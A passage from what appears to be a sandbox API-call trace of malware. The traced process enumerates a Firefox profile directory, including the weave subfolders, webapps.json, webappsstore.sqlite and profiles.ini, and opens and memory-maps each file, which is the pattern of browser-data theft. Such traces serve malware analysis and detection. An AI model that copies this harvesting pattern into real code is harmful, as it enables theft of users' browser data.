(lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.611] CloseHandle (hObject=0x668) returned 1 [0590.611] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0590.611] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.611] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json", lpDst=0x63bd28, nSize=0x57 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json") returned 0x57 [0590.611] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.611] CloseHandle (hObject=0x668) returned 1 [0590.611] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.611] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d [0590.611] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.611] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.611] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.611] lstrlenW (lpString="\\") returned 1 [0590.611] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.611] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.611] lstrlenW (lpString="urlclassifierkey3.txt") returned 21 [0590.611] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.611] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63f8c8 [0590.612] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.612] CloseHandle (hObject=0x668) returned 1 [0590.612] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0590.612] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x63fa18 [0590.612] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt", lpDst=0x63fa18, nSize=0x62 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt") returned 0x62 [0590.612] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.612] CloseHandle (hObject=0x668) returned 1 [0590.612] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.612] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9a [0590.612] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.612] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.612] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.612] lstrcmpiW (lpString1="weave", lpString2=".") returned 1 [0590.612] lstrcmpiW (lpString1="weave", lpString2="..") returned 1 [0590.612] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.612] lstrlenW (lpString="\\") returned 1 [0590.612] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.612] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.612] lstrlenW (lpString="weave") returned 5 [0590.612] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.612] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x63bbf0 [0590.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.612] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.612] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.612] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.612] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.613] lstrcmpiW (lpString1="changes", lpString2=".") returned 1 [0590.613] lstrcmpiW (lpString1="changes", lpString2="..") returned 1 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.613] lstrlenW (lpString="\\") returned 1 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.613] lstrlenW (lpString="changes") returned 7 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.613] LocalFree (hMem=0x63be60) returned 0x0 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.613] lstrlenW (lpString="\\*.*") returned 4 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes") returned 89 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.613] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*.*", lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0x5b9b10 [0590.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0 [0590.613] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.613] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.613] LocalFree (hMem=0x56cab0) returned 0x0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.613] lstrcmpiW (lpString1="failed", lpString2=".") returned 1 [0590.613] lstrcmpiW (lpString1="failed", lpString2="..") returned 1 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.613] lstrlenW (lpString="\\") returned 1 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.613] lstrlenW (lpString="failed") returned 6 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.613] LocalFree (hMem=0x63be60) returned 0x0 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.613] lstrlenW (lpString="\\*.*") returned 4 [0590.613] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed") returned 88 [0590.613] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.613] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*.*", lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0x5b9b10 [0590.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.613] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0 [0590.613] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.614] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.614] LocalFree (hMem=0x56cab0) returned 0x0 [0590.614] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.614] lstrcmpiW (lpString1="toFetch", lpString2=".") returned 1 [0590.614] lstrcmpiW (lpString1="toFetch", lpString2="..") returned 1 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.614] lstrlenW (lpString="\\") returned 1 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave") returned 81 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x63be60 [0590.614] lstrlenW (lpString="toFetch") returned 7 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\") returned 82 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.614] LocalFree (hMem=0x63be60) returned 0x0 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.614] lstrlenW (lpString="\\*.*") returned 4 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch") returned 89 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.614] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*.*", lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0x5b9b10 [0590.614] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.614] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 1 [0590.614] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.614] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.614] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5c4 | out: lpFindFileData=0x52d5c4) returned 0 [0590.614] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.614] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.614] LocalFree (hMem=0x56cab0) returned 0x0 [0590.614] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.614] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.614] LocalFree (hMem=0x63bd28) returned 0x0 [0590.614] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.614] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.614] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0590.614] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.614] lstrlenW (lpString="\\") returned 1 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.614] lstrlenW (lpString="webapps") returned 7 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.614] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.614] lstrlenW (lpString="\\*.*") returned 4 [0590.614] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.614] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.614] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*.*", lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0x5b9b50 [0590.614] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.614] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.615] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.615] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 1 [0590.615] lstrlenW (lpString="\\") returned 1 [0590.615] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps") returned 83 [0590.615] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63be60 [0590.615] lstrlenW (lpString="webapps.json") returned 12 [0590.615] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\") returned 84 [0590.615] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.615] LocalFree (hMem=0x63be60) returned 0x0 [0590.615] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.615] CloseHandle (hObject=0x66c) returned 1 [0590.615] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.615] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63fa18 [0590.615] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json", lpDst=0x63fa18, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json") returned 0x61 [0590.615] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.615] CloseHandle (hObject=0x66c) returned 1 [0590.615] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.615] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2 [0590.615] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0590.615] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.615] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.615] CloseHandle (hObject=0x4e0) returned 1 [0590.616] CloseHandle (hObject=0x66c) returned 1 [0590.616] LocalFree (hMem=0x63fa18) returned 0x0 [0590.616] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.616] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d83c | out: lpFindFileData=0x52d83c) returned 0 [0590.616] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.616] LocalFree (hMem=0x63bd28) returned 0x0 [0590.616] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.616] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 1 [0590.616] lstrlenW (lpString="\\") returned 1 [0590.616] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.616] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.616] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0590.616] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.616] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.616] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.616] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.616] CloseHandle (hObject=0x668) returned 1 [0590.616] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.616] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.616] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite", lpDst=0x2ed9860, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite") returned 0x60 [0590.616] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.616] CloseHandle (hObject=0x668) returned 1 [0590.616] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.616] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.616] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0590.616] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.617] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.618] CloseHandle (hObject=0x66c) returned 1 [0590.618] CloseHandle (hObject=0x668) returned 1 [0590.618] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.618] LocalFree (hMem=0x56cab0) returned 0x0 [0590.618] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dab4 | out: lpFindFileData=0x52dab4) returned 0 [0590.618] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.618] LocalFree (hMem=0x63d6b0) returned 0x0 [0590.618] LocalFree (hMem=0x63d588) returned 0x0 [0590.618] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd2c | out: lpFindFileData=0x52dd2c) returned 0 [0590.618] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.618] LocalFree (hMem=0x5e6108) returned 0x0 [0590.618] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.618] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 1 [0590.618] lstrlenW (lpString="\\") returned 1 [0590.618] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.618] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed3050 [0590.618] lstrlenW (lpString="profiles.ini") returned 12 [0590.618] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 51 [0590.618] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5d7c90 [0590.618] LocalFree (hMem=0x2ed3050) returned 0x0 [0590.618] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.618] CloseHandle (hObject=0x4c8) returned 1 [0590.618] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x40 [0590.618] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5e6108 [0590.618] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini", lpDst=0x5e6108, nSize=0x40 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini") returned 0x40 [0590.618] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.618] CloseHandle (hObject=0x4c8) returned 1 [0590.618] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 